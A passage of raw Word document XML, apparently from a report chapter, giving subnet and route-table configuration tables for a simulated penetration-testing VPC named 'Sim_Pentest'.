    <w:p w14:paraId="4AA81615" w14:textId="225C18D8" w:rsidR="00D86894" w:rsidRPr="00D77DFE" w:rsidRDefault="00D86894" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The configuration of the route table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 2 is shown in Table 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F69DB81" w14:textId="303E31C1" w:rsidR="00D401CC" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.5: Configuration of the Route Table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubnet 2</w:t>
      </w:r>
      <w:r w:rsidR="003A1361">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4269"/>
        <w:gridCol w:w="4224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="50A97F29" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB33C3A" w14:textId="34F84516"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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="561A793A" w14:textId="29172A98"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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="0D7AA120" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1180209D" w14:textId="18D7FAB2"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10.0.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B6FDCE8" w14:textId="287C75B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Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="7218283C" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34841162" w14:textId="3EF210F0"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="499B9E63" w14:textId="50A10F05"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Internet Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="2962BE6D" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6851B7F7" w14:textId="5B89A85C"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 xml:space="preserve">Explicit subnet association </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220B5FB1" w14:textId="3BA20460"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Subnet_2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18B0B96B" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E16C909" w14:textId="101F37EA" w:rsidR="00D86894" w:rsidRPr="00D77DFE" w:rsidRDefault="00D86894" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration used in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 3 is shown in Table 4.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD8E32" w14:textId="0527BD21" w:rsidR="00D401CC" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"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 xml:space="preserve">Table </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration of the Subnet 3</w:t>
      </w:r>
      <w:r w:rsidR="003A1361">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9016" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="17AD8B45" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D7C063" w14:textId="7777777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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DFC6B4F" w14:textId="7777777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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="6F74FDBC" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C49A2C" w14:textId="77777777"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C5B8E75" w14:textId="45AC40A0"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Subnet_3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="237F23BD" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76371053" w14:textId="77777777"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VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397A4A3F" w14:textId="77777777" w:rsidR="00342153" w:rsidRPr="00D77DFE" w:rsidRDefault="00342153" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sim_Pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="6C22D2E6" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F8ABCC2" w14:textId="77777777"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IPv4 CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68785A08" w14:textId="104E464A"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10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="3A8053BF" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F01B446" w14:textId="77777777"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Available IPv4 addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6D9880" w14:textId="7777777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250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="1EDC99D1" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681999C8" w14:textId="24B96E70" w:rsidR="00342153" w:rsidRPr="00D77DFE" w:rsidRDefault="00342153"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IPv6 CI</w:t>
            </w:r>
            <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="392D6DDD" w14:textId="7777777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Not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B35F018" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F86AB9" w14:textId="4EC5F432" w:rsidR="00342153" w:rsidRPr="00D77DFE" w:rsidRDefault="00D86894" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration of the route table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 3 is shown in Table 4.7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611915B1" w14:textId="608F4CAA" w:rsidR="00D401CC" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.7: Configuration of the Route Table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubnet 3</w:t>
      </w:r>
      <w:r w:rsidR="003A1361">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4269"/>
        <w:gridCol w:w="4224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="2A25AAEE" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22CDCD32" w14:textId="53055BFD" w:rsidR="00342153" w:rsidRPr="00D77DFE" w:rsidRDefault="00342153" w:rsidP="00324A56">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="2146"/>
              </w:tabs>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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C45BB0C" w14:textId="7AE5FD12"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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="1EF4D867" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021B31B3" w14:textId="56FC7679"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10.0.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684E4D35" w14:textId="2E59DA8C"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Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="2629B374" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="321EB259" w14:textId="4821F77D"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EACCC62" w14:textId="5A204CF3"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Internet Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00342153" w:rsidRPr="00D77DFE" w14:paraId="2F1F54BA" w14:textId="77777777" w:rsidTr="00342153">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D6398A" w14:textId="303B2B26"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 xml:space="preserve">Explicit subnet association </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D6A3927" w14:textId="78C3ED37" w:rsidR="00342153" w:rsidRPr="00D77DFE" w:rsidRDefault="00342153"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Subnet_3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A47620C" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6E509D" w14:textId="221E4397" w:rsidR="00317F9F" w:rsidRPr="00D77DFE" w:rsidRDefault="00D86894" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration used in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 4 is shown in Table 4.8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542AC45" w14:textId="56A21880" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D401CC" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration of the Subnet </w:t>
      </w:r>
      <w:r w:rsidR="006D6EE0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00512AA9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9016" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="7E7D3B3D" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA09C4D"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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4298E45A"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="7241D55C" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25569E9B" w14:textId="77777777" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="070F5523" w14:textId="41838FEE"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Subnet_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="3B7F994F" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A32CB8" w14:textId="77777777" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5"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VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28F78A41"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sim_Pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="0C4813E2" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2929404C" w14:textId="77777777" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5"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IPv4 CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9459DC" w14:textId="70655FB2"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10.0.4.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="49786250" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
